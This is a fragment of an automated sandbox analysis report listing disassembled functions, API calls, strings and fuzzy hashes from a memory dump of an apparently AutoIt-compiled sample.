                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassName_wcscmp
                                                                                                                                                                            • String ID: #32770
                                                                                                                                                                            • API String ID: 2292705959-463685578
                                                                                                                                                                            • Opcode ID: 3d3ce4d54a740eba2d3eea3129a20629638e26d16a27be9704b91fcd836c6701
                                                                                                                                                                            • Instruction ID: 5a87869e863544bce8e06ab666466261b0b21f395b67cadd354c8e91729bccbb
                                                                                                                                                                            • Opcode Fuzzy Hash: 3d3ce4d54a740eba2d3eea3129a20629638e26d16a27be9704b91fcd836c6701
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EE02B3260022C17E3209A959C45F97F7ACEB45721F00006BF910D3041E5709A458BD4
                                                                                                                                                                            APIs
                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004B81CA
                                                                                                                                                                              • Part of subcall function 00483598: _doexit.LIBCMT ref: 004835A2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message_doexit
                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                                                                            • Opcode ID: f1364bb141b1146bbb9146310ed80522f98fbed6264dbfe3f7fb8bfbe7598b4b
                                                                                                                                                                            • Instruction ID: 92d95482120e50b3d1a304077acd59d59e71b85af2eaa160f7d3f306d8db6765
                                                                                                                                                                            • Opcode Fuzzy Hash: f1364bb141b1146bbb9146310ed80522f98fbed6264dbfe3f7fb8bfbe7598b4b
                                                                                                                                                                            • Instruction Fuzzy Hash: E6D0123228536832D61532A96C06FCA7A4C4B05F5AF10442BBB08555D389D9558242AD
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0049B564: _memset.LIBCMT ref: 0049B571
                                                                                                                                                                              • Part of subcall function 00480B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0049B540,?,?,?,0046100A), ref: 00480B89
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0046100A), ref: 0049B544
                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0046100A), ref: 0049B553
                                                                                                                                                                            Strings
                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0049B54E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                            • API String ID: 3158253471-631824599
                                                                                                                                                                            • Opcode ID: 5925ef4f2f592ef5af013969b7925f8435ba2e3a9fd234fcc5193e19d09f65f9
                                                                                                                                                                            • Instruction ID: 3dea9161e01c14cb6e9cb6023857c25993fc3ef4351ef4a4051878393d8eeffd
                                                                                                                                                                            • Opcode Fuzzy Hash: 5925ef4f2f592ef5af013969b7925f8435ba2e3a9fd234fcc5193e19d09f65f9
                                                                                                                                                                            • Instruction Fuzzy Hash: 19E06D70200350CBD720DF29E5083567FE4EF00768F05893EE446C6391E7B8E408CBA5